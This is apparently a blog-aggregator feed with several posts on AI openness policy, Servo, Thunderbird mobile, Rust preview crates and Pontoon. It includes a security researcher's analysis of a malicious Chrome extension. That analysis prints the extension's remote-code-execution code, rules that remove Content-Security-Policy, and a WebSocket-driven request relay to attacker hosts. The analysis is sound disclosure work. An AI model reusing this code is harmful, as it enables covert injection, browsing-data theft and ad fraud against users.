    "data": "iVBORw0KGgoAAAANSUhEUgAA[...]8AbxR064eNvgIAAAAASUVORK5CYII="
  }
}

Bug Fixes

Mozilla Privacy BlogNavigating the Future of Openness and AI Governance: Insights from the Paris Openness Workshop

In December 2024, in the lead-up to the AI Action Summit, Mozilla, Fondation Abeona, École Normale Supérieure (ENS) and the Columbia Institute of Global Politics gathered at ENS in Paris, bringing together a diverse group of AI experts, academics, civil society, regulators and business leaders to discuss a topic increasingly central to the future of AI: what openness means and how it can enable trustworthy, innovative, and equitable outcomes.

The workshop followed the Columbia Convenings on Openness and AI, which Mozilla held in partnership with Columbia University’s Institute of Global Politics. These gatherings, held over the course of 2024 in New York and San Francisco, brought together over 40 experts to address what “openness” should mean in the AI era.

Over the past two years, Mozilla has mounted a significant effort to promote and defend the role of openness in AI. Mozilla launched Mozilla.ai, an initiative focused on ethical, open-source AI tools, and supported small-scale, localized AI projects through its Builders accelerator program. Beyond technical investments, Mozilla has also been a vocal advocate for openness in AI policy, urging governments to adopt regulatory frameworks that foster competition and accountability while addressing risks. Through these initiatives, Mozilla is shaping a future where AI development aligns with public interest values.

This Paris Openness workshop discussion — part of the official ‘Road to the Paris AI Summit’ taking place in February 2025 — looked to bring together the European AI community and form actionable recommendations for policymakers. While it embraced healthy debate and disagreement around issues such as definitions of openness in AI, there was nevertheless broad agreement on the urgency of crafting collective ideas to advance openness while navigating an increasingly complex commercial, political and regulatory landscape.

The stakes could not be higher. As AI continues to shape our societies, economies, and governance systems, openness emerges as both an opportunity and a challenge. On one hand, open approaches can expand access to AI tools, foster innovation, and enhance transparency and accountability. On the other hand, they raise complex questions about safety and misuse. In Europe, these questions intersect with transformative regulatory frameworks like the EU AI Act, which seeks to ensure that AI systems are both safe and aligned with fundamental rights.

As in software development, the goal of being ‘open’ in AI is a crucial one. At its heart, we were reminded in the discussion, openness is a holistic outlook. For AI in particular it is a pathway to a more pluralistic tool – one that can be more transparent, contextual, participatory and culturally appropriate. Each of these goals, however, contains natural tensions within it.

A central question of this most recent dialogue challenged participants on the best ways to build with safety in mind while also embracing openness. The day was broken down into two workshops that examined these questions from a technical and policy standpoint.

Running through both of the workshops was the thread of a persistent challenge: the multifaceted nature of the term openness. In the policy context, the term “open-source” can be too narrow, and at times, it risks being seen as an ideological stance rather than a pragmatic tool for addressing specific issues. To address this, many participants felt openness should be framed as a set of components — including open models, data, and tools — each of which has specific benefits and risks.

Examining Technical Perspectives on Openness and Safety

A significant concern for many in the open-source community is getting access to the best existing safety tools. Despite the increasing importance of AI safety, many researchers can find it difficult or expensive to access tools to help identify and address AI risks. In particular the discussion surfaced an increasing tension between some researchers and startups who have found it difficult to access datasets of known CSAM (Child Sexual Abuse Material) hashes. Access to these datasets could help mitigate misuse or clean training datasets. The workshop called for broader sharing of safety tools and more support for those working at the cutting edge of AI development.

More widely, some participants were frustrated by perceptions that open-source AI development is not bothered by questions of safety. They pointed out that, especially when it comes to regulation, a focus on safety makes open approaches even more competitive.

Discussing Policy Implications of Openness in AI

Policy discussions during the workshop focused on the economic, societal, and regulatory dimensions of openness in AI. These ranged over several themes, including:

  1. Challenging perceptions of openness: There is a clear need to change the narrative around openness, especially in policymaking circles. The open-source community must both act as a community and present itself as knowledgeable and solution-oriented, demonstrating how openness can be a means to advancing the public interest — not an abstract ideal. As one participant pointed out, openness should be viewed as a tool for societal benefit, not as an end in itself.
  2. Tensions between regulation and innovation are misleading: As one of the first AI regulatory frameworks to be drafted, the EU’s AI Act is viewed by many as a test bed for getting to smarter AI regulation. While regulation is widely characterised as obstructing innovation, some participants highlighted that this framing can be misleading: many new entrants seek out jurisdictions with favourable regulatory and competition policies that level the playing field.
  3. A changing U.S. Perspective: In the United States, the open-source AI agenda has gained significant traction, particularly in the wake of incidents like the Llama leaks, which showed that many of the feared risks associated with openness did not materialize. Significantly, the U.S. National Telecommunications and Information Administration emphasized the benefits of open source AI technology and introduced a nuanced view of safety concerns around open-weight AI models.

Many participants also agreed that policymakers, many of whom are not deeply immersed in the technicalities of AI, need a clearer framework for understanding the value of openness. Considering the focus of the upcoming Paris AI Summit, some participants felt one solution could lie in focusing on public interest AI. This concept resonates more directly with broader societal goals while still acknowledging the risks and challenges that openness brings.

Recommendations 

Embracing openness in AI is non-negotiable if we are to build trust and safety; it fosters transparency, accountability, and inclusive collaboration. Openness must extend beyond software to broader access to the full AI stack, including data and infrastructure, with a governance that safeguards public interest and prevents monopolization.

It is clear that the open source community must make its voice louder. If AI is to advance competition, innovation, language, research, culture and creativity for the global majority of people, then an evidence-based approach to the benefits of openness, particularly when it comes to proven economic benefits, is essential for driving this agenda forward.

Several recommendations for policymakers also emerged.

  1. Diversify AI Development: Policymakers should seek to diversify the AI ecosystem, ensuring that it is not dominated by a few large corporations in order to foster more equitable access to AI technologies and reduce monopolistic control. This should be approached holistically, looking at everything from procurement to compute strategies.
  2. Support Infrastructure and Data Accessibility: There is an urgent need to invest in AI infrastructure, including access to data and compute power, in a way that does not exacerbate existing inequalities. Policymakers should prioritize distribution of resources to ensure that smaller actors, especially those outside major tech hubs, are not locked out of AI development.
  3. Understand openness as central to achieving AI that serves the public interest. One of the official tracks of the upcoming Paris AI Action Summit is Public Interest AI. Increasingly, openness should be deployed as a main route to truly publicly interested AI.
  4. Openness should be an explicit EU policy goal: With one of the furthest-along AI regulatory frameworks, the EU will continue to be a testbed for many of the big questions in AI policy. The EU should adopt an explicit focus on promoting openness in AI as a policy goal.

We will be raising all the issues discussed while at the AI Action Summit in Paris. The organizers hope to host another set of these discussions following the conclusion of the Summit in order to continue working with the community and to better inform governments and other stakeholders around the world.

The list of participants at the Paris Openness Workshop is below:

  • Linda Griffin – VP of Global Policy, Mozilla
  • Udbhav Tiwari – Director, Global Product Policy, Mozilla
  • Camille François – Researcher, Columbia University
  • Tanya Perelmuter – Co-founder and Director of Strategy, Fondation Abeona
  • Yann Lechelle – CEO, Probabl
  • Yann Guthmann – Head of the Digital Economy Department at the French Competition Authority
  • Adrien Basdevant – Tech lawyer, Entropy Law
  • Andrzej Neugebauer – AI Program Director, LINAGORA
  • Thierry Poibeau – Director of Research, CNRS, ENS
  • Nik Marda – Technical Lead for AI Governance, Mozilla
  • Andrew Strait – Associate Director, Ada Lovelace Institute (UK)
  • Paul Keller – Director of Policy, Open Future (Netherlands)
  • Guillermo Hernandez – AI Policy Analyst, OECD
  • Sandrine Elmi Hersi – Unit Chief of “Open Internet”, ARCEP

The post Navigating the Future of Openness and AI Governance: Insights from the Paris Openness Workshop appeared first on Open Policy & Advocacy.

Wladimir PalantAnalysis of an advanced malicious Chrome extension

Two weeks ago I published an article on 63 malicious Chrome extensions. In most cases I could only identify the extensions as malicious. With large parts of their logic being downloaded from some web servers, it wasn’t possible to analyze their functionality in detail.

However, for the Download Manager Integration Checklist extension I have all parts of the puzzle now. This article is a technical discussion of its functionality that somebody tried very hard to hide. I was also able to identify a number of related extensions that were missing from my previous article.

Update (2025-02-04): An update to Download Manager Integration Checklist extension has been released a day before I published this article, clearly prompted by me asking adindex about this. The update removes the malicious functionality and clears extension storage. Luckily, I’ve saved both the previous version and its storage contents.

Screenshot of an extension pop-up. The text in the popup says “Seamlessly integrate the renowned Internet Download Manager (IDM) with Google Chrome, all without the need for dubious third-party extensions” followed up with some instructions.

The problematic extensions

Since my previous article I found a bunch more extensions with malicious functionality that is almost identical to Download Manager Integration Checklist. The extension Auto Resolution Quality for YouTube™ does not seem to be malicious (yet?) but shares many remarkable oddities with the other extensions.

Name | Weekly active users | Extension ID | Featured
Freemybrowser | 10,000 | bibmocmlcdhadgblaekimealfcnafgfn |
AutoHD for Twitch™ | 195 | didbenpmfaidkhohcliedfmgbepkakam |
Free simple Adult Blocker with password | 1,000 | fgfoepffhjiinifbddlalpiamnfkdnim |
Convert PDF to JPEG/PNG | 20,000 | fkbmahbmakfabmbbjepgldgodbphahgc |
Download Manager Integration Checklist | 70,000 | ghkcpcihdonjljjddkmjccibagkjohpi |
Auto Resolution Quality for YouTube™ | 223 | hdangknebhddccoocjodjkbgbbedeaam |
Adblock.mx - Adblock for Chrome | 1,000 | hmaeodbfmgikoddffcfoedogkkiifhfe |
Auto Quality for YouTube™ | 100,000 | iaddfgegjgjelgkanamleadckkpnjpjc |
Anti phising safer browsing for chrome | 7,000 | jkokgpghakemlglpcdajghjjgliaamgc |
Darktheme for google translate | 40,000 | nmcamjpjiefpjagnjmkedchjkmedadhc |

Additional IOCs:

  • adblock[.]mx
  • adultblocker[.]org
  • autohd[.]org
  • autoresolutionquality[.]com
  • browserguard[.]net
  • freemybrowser[.]com
  • freepdfconversion[.]com
  • internetdownloadmanager[.]top
  • megaxt[.]com
  • darkmode[.]site

“Remote configuration” functionality

The Download Manager Integration Checklist extension was an odd one on the list in my previous article. It has very minimal functionality: it’s merely supposed to display a set of instructions. This is a task that doesn’t require any permissions at all, yet the extension requests access to all websites and the declarativeNetRequest permission. Apparently, nobody has noticed this inconsistency so far.

Looking at the extension code, there is another oddity. The checklist displayed by the extension is downloaded from Firebase, Google’s online database. Yet there is also a download from https://help.internetdownloadmanager.top/checklist, with the response being handled by this function:

async function u(l) {
  await chrome.storage.local.set({ checklist: l });

  await chrome.declarativeNetRequest.updateDynamicRules({
    addRules: l.list.add,
    removeRuleIds: l.list.rm,
  });
}

This is what I flagged as malicious functionality initially: part of the response is used to add declarativeNetRequest rules dynamically. At first I missed something however: the rest of the data being stored as checklist is also part of the malicious functionality, allowing execution of remote code:

function f() {
  let doc = document.documentElement;
  function updateHelpInfo(info, k) {
    doc.setAttribute(k, info);
    doc.dispatchEvent(new CustomEvent(k.substring(2)));
    doc.removeAttribute(k);
  }

  document.addEventListener(
    "description",
    async ({ detail }) => {
      const response = await chrome.runtime.sendMessage(
        detail.msg,
      );
      document.dispatchEvent(
        new CustomEvent(detail.responseEvent, {
          detail: response,
        }),
      );
    },
  );

  chrome.storage.local.get("checklist").then(
    ({ checklist }) => {
      if (checklist && checklist.info && checklist.core) {
        updateHelpInfo(checklist.info, checklist.core);
      }
    },
  );
}

There is a tabs.onUpdated listener hidden within the legitimate webextension-polyfill module that will run this function for every web page via tabs.executeScript API.

This function looks fairly unsuspicious. Understanding its functionality is easier if you know that checklist.core is "onreset". So it takes the document element, fills its onreset attribute with some JavaScript code from checklist.info, triggers the reset event and removes the attribute again. That’s how this extension runs some server-provided code in the context of every website.
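The reason this trick works is that a string assigned to an event-handler content attribute gets compiled by the browser into a function body. Here is a minimal Node sketch of that compilation step, with new Function standing in for the browser’s attribute handling (the function name and payload are mine, purely for illustration):

```javascript
// Model of what the browser does with onreset="...": the attribute string
// is compiled into an event-handler function, roughly new Function().
function compileHandlerAttribute(code) {
  return new Function("event", code);
}

// A server-provided string now executes as code once the event fires.
const payload = "return 6 * 7;";
const handler = compileHandlerAttribute(payload);
console.log(handler(undefined)); // 42
```

In the extension’s case the payload string arrives in checklist.info, and the “event firing” is the dispatched reset event, so the same compilation happens on every page the content script touches.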

The code being executed

When the extension downloads its “checklist” immediately after installation, the server response will be empty. Sort of: “nothing to see here, this is merely some dead code somebody forgot to remove.” The server sets a cookie however, allowing it to recognize the user on subsequent downloads. And only after two weeks or so will it respond with the real thing. For example, the list key of the response then looks like this:

"add": [
  {
    "action": {
      "responseHeaders": [
        {
          "header": "Content-Security-Policy-Report-Only",
          "operation": "remove"
        },
        {
          "header": "Content-Security-Policy",
          "operation": "remove"
        }
      ],
      "type": "modifyHeaders"
    },
    "condition": {
      "resourceTypes": [
        "main_frame"
      ],
      "urlFilter": "*"
    },
    "id": 98765432,
    "priority": 1
  }
],
"rm": [
  98765432
]

No surprise here, this is about removing Content Security Policy protection from all websites, making sure it doesn’t interfere when the extension injects its code into web pages.

As I already mentioned, the core key of the response is "onreset", an essential component towards executing the JavaScript code. And the JavaScript code in the info key is heavily obfuscated by JavaScript Obfuscator, with most strings and property names encrypted to make reverse engineering harder.

Of course this kind of obfuscation can still be reversed, and you can see the entire deobfuscated code here. Note that most function and variable names have been chosen randomly, the original names being meaningless. The code consists of three parts:

  1. Marshalling of various extension APIs: tabs, storage, declarativeNetRequest. This uses DOM events to communicate with the function f() mentioned above; that function forwards the messages to the extension’s background worker, and the worker then calls the respective APIs.

    In principle, this allows reading out your entire browser state: how many tabs, what pages are loaded etc. Getting notified on changes is possible as well. The code doesn’t currently use this functionality, but the server can of course produce a different version of it any time, for all users or only for selected targets.

    There is also another aspect here: in order to run remote code, this code has been moved into the website realm. This means however that any website can abuse these APIs as well. It’s only a matter of knowing which DOM events to send. Yes, this is a massive security issue.

  2. Code downloading a 256 KiB binary blob from https://st.internetdownloadmanager.top/bff and storing it in encoded form as bff key in the extension storage. No, this isn’t your best friend forever but a Bloom filter. This filter is applied to SHA-256 hashes of domain names and determines on which domain names the main functionality should be activated.

    With Bloom filters, it is impossible to determine which exact data went into it. It is possible however to try out guesses, to see which one it accepts. Here is the list of matching domains that I could find. This list looked random to me initially, and I even suspected that noise has been added to it in order to hide the real target domains. Later however I could identify it as the list of adindex advertisers, see below.

  3. The main functionality: when active, it sends the full address of the current page to https://st.internetdownloadmanager.top/cwc2 and might get a “session” identifier back. It is likely that this server stores the addresses it receives and sells the resulting browsing history. This part of the functionality stays hidden however.

    The “session” handling is visible on the other hand. There is some rate limiting here, making sure that this functionality is triggered at most once per minute and no more than once every 12 hours for each domain. If activated, a message is sent back to the extension’s background worker telling it to connect to wss://pa.internetdownloadmanager.top/s/<session>. All further processing happens there.

The “session” handling

Here we are back in the extension’s static code, no longer remotely downloaded code. The entry point for the “session” handling is function __create. Its purpose has been concealed, with some essential property and method names contained in the obfuscated code above or received from the web socket connection. I filled in these parts and simplified the code to make it easier to understand:

var __create = url => {
  const socket = new this.WebSocket(url);
  const buffer = {};
  socket.onmessage = event => {
    let message = event.data.arrayBuffer ? event.data : JSON.parse(event.data);
    this.stepModifiedMatcher(socket, buffer, message)
  };
};

stepModifiedMatcher =
  async (socket, buffer, message) => {
    if (message.arrayBuffer)
      buffer[1] = message.arrayBuffer();
    else {
      let [url, options] = message;
      if (buffer[1]) {
        options.body = await buffer[1];
        buffer[1] = null;
      }

      let response = await this.fetch(url, options);
      let data = await Promise.all([
        !message[3] ? response.arrayBuffer() : false,
        JSON.stringify([...response.headers.entries()]),
        response.status,
        response.url,
        response.redirected,
      ]);
      for (const entry of data) {
        if (socket.readyState === 1) {
          socket.send(entry);
        }
      }
    }
  };

This receives instructions from the web socket connection on what requests to make. Upon success the extension sends information like response text, HTTP headers and HTTP status back to the server.

What is this good for? Before I could observe this code in action I was left guessing. Is this an elaborate approach to de-anonymize users? On some websites their name will be right there in the server response. Or is this about session hijacking? There would be session cookies in the headers and CSRF tokens in the response body, so the extension could be instrumented to perform whatever actions necessary on behalf of the attackers – like initiating a money transfer once the user logs into their PayPal account.

The reality turned out to be far more mundane. When I finally managed to trigger this functionality on the Ashley Madison website, I saw the extension perform lots of web requests. Apparently, it was replaying a browsing session that was recorded two days earlier with the Firefox browser. The entry point of this session: https://api.sslcertifications.org/v1/redirect?advertiserId=11EE385A29E861E389DA14DDA9D518B0&adspaceId=11EE4BCA2BF782C589DA14DDA9D518B0&customId=505 (redirecting to ashleymadison.com).

Developer Tools screenshot, listing a number of network requests. It starts with ashleymadison.com and loads a number of JavaScript and CSS files as well as images. All requests are listed as fetch requests initiated by background.js:361.

The server handling api.sslcertifications.org belongs to the German advertising company adindex. Their list of advertisers is mostly identical to the list of domains matched by the Bloom filter the extension uses. So this is ad fraud: the extension generates fake link clicks, making sure its owner earns money for “advertising” websites like Ashley Madison. It uses the user’s IP address and replays recorded sessions to make this look like legitimate traffic, hoping to avoid detection this way.

I contacted adindex and they confirmed that sslcertifications.org is a domain registered by a specific publisher but handled by adindex. They also said that they confronted the publisher in question with my findings and, having found their response unsatisfactory, blocked this publisher. Shortly afterwards the internetdownloadmanager.top domain became unreachable, and the api.sslcertifications.org site no longer has a valid SSL certificate. Domains related to other extensions, the ones I didn’t mention in my request, are still accessible.

Who is behind these extensions?

The adindex CEO declined to provide the identity of the problematic publisher. There are obvious data protection reasons for that. However, as I looked further I realized that he might have additional reasons to withhold this information.

While most extensions I list provide clearly fake names and addresses, the Auto Quality for YouTube™ extension is associated with the MegaXT website. That website doesn’t merely feature a portfolio of two browser extensions (the second one being an older Manifest V2 extension also geared towards running remote code) but also a real owner with a real name. Who just happens to be a developer at adindex.

There is also the company eokoko GmbH, which develops the Auto Resolution Quality for YouTube™ extension. This extension appears to be non-malicious at the moment, yet it shares a number of traits with the malicious extensions on my list. The director of this company is once again the same adindex developer.

And not just any developer. According to his website he used to be CTO at adindex in 2013 (I couldn’t find an independent confirmation for this). He also founded a company together with the adindex CEO in 2018, something that is confirmed by public records.

When I mentioned this connection in my communication with adindex CEO the response was:

[He] works for us as a freelancer in development. Employees (including freelancers) are generally not allowed to operate publisher accounts at adindex and the account in question does not belong to [this developer]. Whether he operates extensions is actually beyond my knowledge.

I want to conclude this article with some assorted history facts:

  • The two extensions associated with MegaXT have been running remote code since at least 2021. I don’t know whether they were outright malicious from the start, this would be impossible to prove retroactively even with source code given that they simply loaded some JavaScript code into the extension context. But both extensions have reviews complaining about malicious functionality going back to 2022.
  • Darktheme for google translate and Download Manager Integration Checklist extensions both appear to have changed hands in 2024, after which they requested more privileges with an update in October 2024.
  • Download Manager Integration Checklist extension used to be called “IDM Integration Module” in 2022. There have been at least five more extensions with similar names (not counting the official one), all removed from Chrome Web Store due to “policy violation.” This particular extension was associated with a website which is still offering “cracks” that show up as malware on antivirus scans (the installation instructions “solve” this by recommending to turn off antivirus protection). But that’s most likely the previous extension owner.
  • Convert PDF to JPEG/PNG appears to have gone through a hidden ownership change in 2024, after which an update in September 2024 requested vastly extended privileges. However, the extension has reviews complaining about spammy behavior going back to 2019.

Mozilla Performance BlogPerformance Testing Newsletter (Q4 Edition)

Welcome to the latest edition of the Performance Testing Newsletter! The PerfTools team empowers engineers with tools to continuously improve the performance of Mozilla products. See below for highlights from the changes made in the last quarter.

This quarter also saw the release of perf.compare! It’s a new tool used for making comparisons between try runs (or other pushes). It is now the default comparison tool used for these comparisons and replaces the Compare View that was in use previously. Congratulations to all the folks involved in making this release happen! Feel free to reach out in #perfcompare on Matrix if there are any questions, feature requests, etc. Bugs can be filed in Testing :: PerfCompare.

Highlights from Contributors

PerfCompare

Profiler

Perftest

Highlights from Rest of the Team

Blog Posts ✍️

Contributors

If you have any questions, or are looking to add performance testing for your code component, you can find us in #perftest on Element, or #perf-help on Slack.

The Servo BlogServo in 2024: stats, features and donations

Two years after the renewed activity on the project we can confirm that Servo is fully back.

If we ignore the bots, in 2024 we’ve had 129 unique contributors (+143% over 54 last year), landing 1,771 pull requests (+163% over 673), and that’s just in our main repo!

Including bots, the total number of PRs merged goes up to 2,674 (+144% over 1,094). From all this work, 26% of the PRs were made by Igalia, 40% by other contributors and the rest by the bots (34%). This shows how the Servo community has been growing and becoming more diverse with new actors participating actively in the project.

2018 2019 2020 2021 2022 2023 2024
Merged PRs 1,188 986 669 118 65 776 1,771
Unique contributors 142 141 87 37 20 54 129
Average unique contributors per month 27.33 27.17 14.75 4.92 2.83 11.33 26.33

Now let’s take a look at the data and chart above, which show the evolution since 2018 in number of merged PRs, unique contributors per year, and average contributors per month (excluding bots). We can see the project is back to the numbers of 2018 and 2019, when it was being developed at full speed!

It’s worth noting that Servo’s popularity keeps growing: many folks realized last year that there is new activity on the project, and more and more people are interested in it.

Servo GitHub star history chart showing steady growth since 2013, up to more than 25,000 today <figcaption>Servo GitHub stars haven't stopped growing, now surpassing the 25K threshold.</figcaption>

During 2024 Servo has been present in 8 events with 9 talks: FOSDEM, Open Source Summit North America, Seattle Rust user meetup, GOSIM Europe, Global Software Technology Summit, Linux Foundation Europe Member Summit, GOSIM China, Ubuntu Summit.

If we focus on development, many things have moved forward during the year. Servo’s main dependencies (SpiderMonkey, Stylo and WebRender) have been upgraded, and the new layout engine has kept evolving, adding support for floats, tables, flexbox, fonts, etc. By the end of 2024 Servo passes 1,515,229 WPT subtests (79%). Many other new features have been under active development: WebGPU, Shadow DOM, ReadableStream, WebXR, … Servo now supports two new platforms: Android and OpenHarmony. And we have seen the first experiments of applications using Servo as a web engine (like Tauri, Blitz, QtWebView, Cuervo, Verso and Moto).

In 2024 we have raised 33,632.64 USD with donations via Open Collective and GitHub Sponsors from 500 different people and organizations. Thank you all for supporting us!

With this money we now have 3 servers providing self-hosted runners for Linux, macOS, and Windows, reducing our build times from over an hour to under 30 minutes.

Talking about the future, the Servo TSC has been discussing the roadmap for 2025, which has been updated on the Servo wiki. We have many plans to keep Servo thriving with new features and improvements. Let’s hope for a great 2025!

Mozilla ThunderbirdVIDEO: The Thunderbird Mobile Team

The Thunderbird Mobile team are crafting the newest chapter of the Thunderbird story. In this month’s office hours, we sat down to chat with the entire mobile team! This includes Philipp Kewisch, Sr. Manager of Mobile Engineering (and long-time Thunderbird contributor), and Sr. Software Engineers cketti and Wolf Montwé (long-time K-9 Mail maintainer and developer, respectively). We talk about the journey from K-9 Mail to Thunderbird for Android, what’s new and what’s coming in the near future, and the first steps towards Thunderbird on your iOS devices!

Next month, we’ll be chatting with Laurel Terlesky, Manager of the UI/UX Design Studio! She’ll be sharing her FOSDEM talk, “Thunderbird: Building a Cross-Platform, Scalable Open-Source Design System.” It’s been a while since we’ve chatted with the design team, and it will be great to see what they’re working on.

January Office Hours: The Thunderbird Mobile Team

In June 2022, we announced that K-9 Mail would be joining the Thunderbird family, and would ultimately become Thunderbird for Android. After two years of development, the first beta release of Thunderbird for Android debuted in October 2024, shortly followed by the first stable release. Since then, over 200 thousand users have downloaded the app, and we’ve gotten some very nice reviews in ZDNet and Android Authority. If you haven’t tried us on your Android device yet, now is a great time! And if, like some of us, you’re waiting for Thunderbird to come to your iPhone or iPad, we have some exciting news at the end of our talk.

Want to know more about the Android development process and find out what’s coming soon to the app? Want the first look into our plans for Thunderbird on iOS? Let our mobile team guests provide the answers!

Watch, Read, and Get Involved

We’re so grateful to Philipp, cketti, and Wolf for joining us! We hope this video helps explain more about Thunderbird on Android (and eventually iOS), and encourages you to download the app if you haven’t already. If you’re a regular user, we hope you consider contributing code, translations, or support. And if you’re an iOS developer, we hope you consider joining our team!

VIDEO (Also on Peertube):

Thunderbird for Android Resources:

The post VIDEO: The Thunderbird Mobile Team appeared first on The Thunderbird Blog.

Niko MatsakisPreview crates

This post lays out the idea of preview crates.1 Preview crates would be special crates released by the rust-lang org. Like the standard library, preview crates would have access to compiler internals but would still be usable from stable Rust. They would be used in cases where we know we want to give users the ability to do X but we don’t yet know precisely how we want to expose it in the language or stdlib. In git terms, preview crates would let us stabilize the plumbing while retaining the ability to iterate on the final shape of the porcelain.

Nightly is not enough

Developing large language features is a tricky business. Because everything builds on the language, stability is very important, but at the same time, there are some questions that are very hard to answer without experience. Our main tool for getting this experience has been the nightly toolchain, which lets us develop, iterate, and test features before committing to them.

Because the nightly toolchain comes with no guarantees at all, however, most users who experiment with it do so lightly, just using it for toy projects and the like. For some features, this is perfectly fine, particularly syntactic features like let-else, where you can learn everything you need to know about how it feels from a single crate.

Nightly doesn’t let you build a fledgling ecosystem

Where nightly really fails us though is the ability to estimate the impact of a feature on a larger ecosystem. Sometimes you would like to expose a capability and see what people build with it. How do they use it? What patterns emerge? Often, we can predict those patterns in advance, but sometimes there are surprises, and we find that what we thought would be the default mode of operation is actually kind of a niche case.

For these cases, it would be cool if there were a way to issue a feature in “preview” mode, where people can build on it, but it is not yet released in its final form. The challenge is that if we want people to use this to build up an ecosystem, we don’t want to disturb all those crates when we iterate on the feature. We want a way to make changes that lets those crates keep working until the maintainers have time to port to the latest syntax, naming, or whatever.

Editions are closer, but not quite right

The other tool we have for correcting mistakes is editions. Editions let us change what syntax means and, because they are opt-in, all existing code continues to work.

Editions let us fix a great many things to make Rust more self-consistent, but they carry a heavy cost. They force people to relearn how things in Rust work. They make books outdated. This price is typically too high for us to ship a feature knowing that we are going to change it in a future edition.

Let’s give an example

To make this concrete, let’s take a specific example. The const generics team has been hard at work iterating on the meaning of const trait and in fact there is a pending RFC that describes their work. There’s just one problem: it’s not yet clear how it should be exposed to users. I won’t go into the rationale for each choice, but suffice to say that there are a number of options under current consideration. All of these examples have been proposed, for example, as the way to say “a function that can be executed at compilation time which will call T::default”:

  • const fn compute_value<T: ~const Default>()
  • const fn compute_value<T: const Default>()
  • const fn compute_value<T: Default>()

At the moment, I personally have a preference between these (I’ll let you guess), but I figure I have about… hmm… 80-90% confidence in that choice. And what’s worse, to really decide between them, I think we have to see how the work on async proceeds, and perhaps also what kinds of patterns turn out to be common in practice for const fn. This stuff is difficult to gauge accurately in advance.

Enter preview crates

So what if we released a crate, rust_lang::const_preview? In my dream world, this is released on crates.io, using the namespaces described in [RFC #3243](https://rust-lang.github.io/rfcs/3243-packages-as-optional-namespaces.html). Like any crate, const_preview can be versioned. It would expose exactly one item, a macro const_item that can be used to write const functions that have const trait bounds:

const_preview::const_item! {
    const fn compute_value<T: ~const Default>() {
        // as `~const` is what is implemented today, I'll use it in this example
    }
}

Internally, this const_item! macro can make use of internal APIs in the compiler to parse the contents and apply the special semantics.

Releasing v2.0

Now, maybe we use this for a while, and we find that people really don’t like the ~, so we decide to change the syntax. Perhaps we opt to write const Default instead of ~const Default. No problem, we release a 2.0 version of the crate and we also rewrite 1.0 to take in the tokens and invoke 2.0 using the semver trick.

const_preview::const_item! {
    const fn compute_value<T: const Default>() {
        // the 2.0 syntax drops the `~` from the bound
    }
}

Integrating into the language

Once we decide we are happy with const_item! we can merge it into the language proper. The preview crates are deprecated and simply desugar to the true language syntax. We all go home, drink non-fat flat whites, and pat ourselves on the back.

User-based experimentation

One thing I like about the preview crates is that others can then begin to do their own experiments. Perhaps somebody wants to try out what it would be like if T: Default meant const by default; they can readily write a wrapper that desugars to const_preview::const_item and try it out. And people can build on it. And all that code keeps working once we integrate const functions into the language “for real”, it just looks kinda dated.

Frequently asked questions

Why else might we use previews?

Even if we know the semantics, we could use previews to stabilize features where the user experience is not great. I’m thinking of Generic Associated Types as one example, where the stabilization was slowed because of usability concerns.

What are the risks from this?

The previous answer hints at one of my fears… if preview crates become a widespread way for us to stabilize features with usability gaps, we may accumulate a very large number of them and then never move those features into Rust proper. That seems bad.

Shouldn’t we just make a decision already?

I mean… maybe? I do think we are sometimes very cautious. I would like us to get better at leaning on our judgment. But I also see that sometimes there is a tension between “getting something out the door” and “taking the time to evaluate a generalization”, and it’s not clear to me whether this tension is inherent complexity or an artifact of the way we do business.

But would this actually work? What’s in that crate and what if it is not matched with the right version of the compiler?

One very special thing about libstd is that it is released together with the compiler and hence is able to co-evolve with it, making use of internal APIs that are unstable and change from release to release. If we want to put this crate on crates.io, it will not be able to co-evolve in the same way. Bah. That’s annoying! But I figure we can still handle it by having the preview functionality exposed by crates in the sysroot that ship along with the compiler. These crates would not be directly usable except by our blessed crates.io crates, but they would basically just be shims that expose the underlying stuff. We could of course cut out the middleman and just have people use those sysroot crates directly, but I don’t like that as much because it’s less obvious and because we can’t as easily track reverse dependencies on crates.io to evaluate usage.

A macro seems heavyweight! What other options have you considered?

I also considered the idea of having p# keywords (“preview”), so e.g.

#[allow(preview_feature)]
p#const fn compute_value<T: p#const Default>() {
    // works on stable
}

Using a p# keyword would fire off a lint (preview_feature) that you would probably want to allow.

This is less intrusive, but I like the crate idea better because a crate lets us release a v2.0; there is no way to version the p#const keyword.

What kinds of things can we use preview crates for?

Good question. I’m not entirely sure. It seems like APIs that require us to define new traits and other items would make it tricky to maintain the total interoperability I think we want. Tools like trait aliases etc. (which we need for other reasons) would help.

Who else does this sort of thing?

Ember has formalized this “plumbing first” approach in their version of editions. In Ember, from what I understand, an edition is not a “time-based thing” like it is in Rust. Instead, it indicates a big shift in paradigms, and it comes out when that new paradigm is ready. But part of the process of reaching an edition is to start by shipping core APIs (plumbing APIs) that create the new capabilities. The community can then create wrappers and experiment with the “porcelain” before the Ember crate enshrines a best-practice set of APIs and declares the new Edition ready.

Java has a notion of preview features, but they are not semver guaranteed to stick around.

I’m not sure who else!

Could we use decorators instead?

Usability of decorators like #[const_preview::const_item] is better, particularly in rust-analyzer. The tricky bit there is that decorators can only be applied to valid Rust syntax, so it implies we’d need to extend the parser to include things like ~const forever, whereas I might prefer to have that complexity isolated to the const_preview crate.

So is this a done deal? Is this happening?

I don’t know! People often think that because I write a blog post about something it will happen, but this is currently just in the “early ideation” stage. As I’ve written before, though, I continue to feel that we need some kind of “middle state” for our release process (see e.g. this blog post, Stability without stressing the !@#! out), and I think preview crates could be a good tool to have in our toolbox.


  1. Hat tip to Yehuda Katz and the Ember community, Tyler Mandry, Jack Huey, Josh Triplett, Oli Scherer, and probably a few others I’ve forgotten with whom I discussed this idea. Of course, anything you like they came up with; everything you hate was my addition. ↩︎

Mozilla Localization (L10N)2025 Pontoon survey results

The results from the 2025 Pontoon survey are in and the 3 top-voted features we commit to implement are:

  1. Add ability to preview Fluent strings in the editor (258 votes).
  2. Keep unsaved translations when navigating to other strings (252 votes).
  3. Hint at any available variants when referencing a message (229 votes).

The remaining features ranked as follows:

  1. Add virtual keyboard with special characters to the editor (226 votes).
  2. Link project names in Concordance search results to corresponding strings (223 votes).
  3. Add a batch action to pretranslate a selection of strings (218 votes).
  4. Add ability to edit and remove comments (216 votes).
  5. Enable use of generic machine translation engines with pretranslation (209 votes).
  6. Add ability to report comments and suggestions for abusive content (193 votes).
  7. Add “Copy translation from another locale as suggestion” batch action (186 votes).

We thank everyone who dedicated their time to share valuable responses and suggest potential features for us to consider implementing!

